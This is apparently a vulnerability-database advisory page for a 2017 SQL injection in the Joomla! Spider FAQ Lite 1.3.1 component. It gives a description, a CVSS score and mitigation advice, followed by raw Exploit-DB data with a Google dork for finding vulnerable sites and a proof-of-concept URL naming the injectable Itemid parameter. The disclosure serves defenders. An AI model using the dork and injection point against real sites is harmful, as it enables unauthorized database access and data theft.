Joomla! Component Spider FAQ Lite v1.3.1 - SQL Injection

vendor:

Spider FAQ Lite

by:

Ihsan Sencan

8,8

CVSS

HIGH

SQL Injection

CWE

Product Name: Spider FAQ Lite

Affected Version From: 1.3.1

Affected Version To: 1.3.1

Patch Exists: NO

Related CWE: N/A

CPE: a:web_dorado:spider_faq_lite

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Win7 x64, Kali Linux x64

2017

Joomla! Component Spider FAQ Lite v1.3.1 – SQL Injection

A SQL injection vulnerability exists in Joomla! Component Spider FAQ Lite v1.3.1. An attacker can send a specially crafted HTTP request to the vulnerable application in order to execute arbitrary SQL commands in the back-end database. This can potentially result in the manipulation or disclosure of application data.

Mitigation:

Developers should never construct SQL statements directly from user input. Instead, parameterized statements should be used in order to prevent SQL injection attacks. Additionally, applications should perform input validation to ensure that input is of the correct type, length, format, and value.

Source

Exploit-DB raw data:

# # # # # 
# Exploit Title: Joomla! Component Spider FAQ Lite v1.3.1 - SQL Injection
# Google Dork: inurl:index.php?option=com_spiderfaq
# Date: 16.02.2017
# Vendor Homepage: http://web-dorado.com/
# Software Buy: https://extensions.joomla.org/extensions/extension/directory-a-documentation/faq/spider-faq-lite/
# Demo: http://demo.web-dorado.com/spider-faq.html
# Version: 1.3.1
# Tested on: Win7 x64, Kali Linux x64
# # # # # 
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/index.php?option=com_spiderfaq&view=spiderfaqmultiple&standcat=0&faq_cats=,2,3,&standcatids=&theme=1&searchform=1&expand=0&Itemid=[SQL]
# # # # #